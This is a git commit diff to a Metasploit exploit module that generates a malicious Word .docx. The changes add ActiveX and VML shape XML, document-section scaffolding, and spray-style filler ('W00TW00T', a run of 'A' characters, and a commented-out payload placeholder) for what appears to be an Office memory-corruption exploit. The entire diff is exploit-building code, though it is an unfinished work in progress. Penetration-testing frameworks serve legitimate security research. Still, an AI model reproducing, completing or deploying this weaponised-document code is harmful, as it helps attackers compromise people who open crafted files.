More progress

bug/bundler_fix
sinn3r 2013-11-21 18:48:12 -06:00
parent 56d1c545e7
commit 8382d31f46
1 changed files with 73 additions and 11 deletions

View File

@ -201,7 +201,9 @@ class Metasploit3 < Msf::Exploit::Remote
mscd << [0x00000003].pack('V') mscd << [0x00000003].pack('V')
mscd << [0xfffffffe].pack('V') mscd << [0xfffffffe].pack('V')
mscd << [0xffffffff].pack('V') * 52 mscd << [0xffffffff].pack('V') * 52
# mscd << "PAYLOAD"
mscd << "W00TW00T"
mscd << "A" * 1024
mscd mscd
end end
@ -344,8 +346,37 @@ class Metasploit3 < Msf::Exploit::Remote
'w:shapeid' =>"_x0000_i10#{rid.to_s}" 'w:shapeid' =>"_x0000_i10#{rid.to_s}"
} }
shapetype_attrs = {
'id' => "rId#{rid.to_s}",
'coordsize' => "21600,21600",
'o:spt' => "75",
'o:preferrelative' => "t",
'path' => "m@4@5l@4@11@9@11@9@5xe",
'filled' => "f",
'stroked' => "f"
}
xml.r do xml.r do
xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
xml['v'].shapetype(shapetype_attrs) do
xml['v'].stroke({'joinstyle'=>'miter'})
xml['v'].formulas do
xml['v'].f({'eqn' => "if lineDrawn pixelLineWidth 0"})
xml['v'].f({'eqn' => "sum @0 1 0"})
xml['v'].f({'eqn' => "sum 0 0 @1"})
xml['v'].f({'eqn' => "prod @2 1 2"})
xml['v'].f({'eqn' => "prod @3 21600 pixelWidth"})
xml['v'].f({'eqn' => "prod @3 21600 pixelHeight"})
xml['v'].f({'eqn' => "sum @0 0 1"})
xml['v'].f({'eqn' => "prod @6 1 2"})
xml['v'].f({'eqn' => "prod @7 21600 pixelWidth"})
xml['v'].f({'eqn' => "sum @8 21600 0"})
xml['v'].f({'eqn' => "prod @7 21600 pixelHeight"})
xml['v'].f({'eqn' => "sum @10 21600 0"})
end
xml['v'].path({'o:extrusionok' => "f", 'gradientshapeok' => "t", 'o:connecttype' => "rect"})
xml['o'].lock({'v:ext' => "edit", 'aspectratio' => "t"})
end
xml['v'].shape(shape_attrs) xml['v'].shape(shape_attrs)
xml['w'].control(control_attrs) xml['w'].control(control_attrs)
end end
@ -410,6 +441,36 @@ class Metasploit3 < Msf::Exploit::Remote
end end
#
# Creates a <w:sectPr> tag
# @param xml [Element]
#
def create_secpr(xml)
sectpr_attrs = {
'w:rsidR' => "00D15BD0",
'w:rsidRPr' => "00D15BD0",
'w:rsidSect' => "00F8254F"
}
pgmar_attrs = {
'w:top' => "1",
'w:right' => "1",
'w:bottom' => "1",
'w:left' => "1",
'w:header' => "1",
'w:footer' => "1",
'w:gutter' => "0"
}
xml['w'].sectPr(sectpr_attrs) do
xml['w'].pgSz({'w:w'=>"1", 'w:h'=>"1"})
xml['w'].pgMar(pgmar_attrs)
xml['w'].cols({'w:space'=>"1"})
xml['w'].docGrid({'w:linePitch'=>"1"})
end
end
# #
# Creates a document.xml file # Creates a document.xml file
# @param pre_defs [Array] # @param pre_defs [Array]
@ -420,7 +481,7 @@ class Metasploit3 < Msf::Exploit::Remote
def init_doc_xml(last_rid, pre_defs, activex, tiff_file) def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
# Get all the required pre-defs # Get all the required pre-defs
chart_rids = [] chart_rids = []
pre_defs.select { |e| chart_rids << e[:id] } pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//}
# Get all the ActiveX RIDs # Get all the ActiveX RIDs
ax_rids = [] ax_rids = []
@ -461,10 +522,10 @@ class Metasploit3 < Msf::Exploit::Remote
xml.rPr do xml.rPr do
xml.lang({'w:val' => "en-US"}) xml.lang({'w:val' => "en-US"})
end end
end
ax_rids.each do |rid| ax_rids.each do |rid|
create_ax_run_element(xml, rid) create_ax_run_element(xml, rid)
end
end end
end end
@ -480,6 +541,7 @@ class Metasploit3 < Msf::Exploit::Remote
create_pic_run_element(xml, tiff_rid) create_pic_run_element(xml, tiff_rid)
end end
create_secpr(xml)
end end
end end
end end
@ -502,16 +564,16 @@ class Metasploit3 < Msf::Exploit::Remote
def make_contenttype_xml(overrides) def make_contenttype_xml(overrides)
contenttypes = [ contenttypes = [
{ {
:Extension =>"rels", :Extension => "rels",
:ContentType =>"application/vnd.openxmlformats-package.relationships+xml" :ContentType => "application/vnd.openxmlformats-package.relationships+xml"
}, },
{ {
:Extension =>"xml", :Extension => "xml",
:ContentType =>"application/xml" :ContentType => "application/xml"
}, },
{ {
:Extension =>"jpeg", :Extension => "jpeg",
:Contenttype =>"image/jpeg" :Contenttype => "image/jpeg"
}, },
{ {
:Extension => "bin", :Extension => "bin",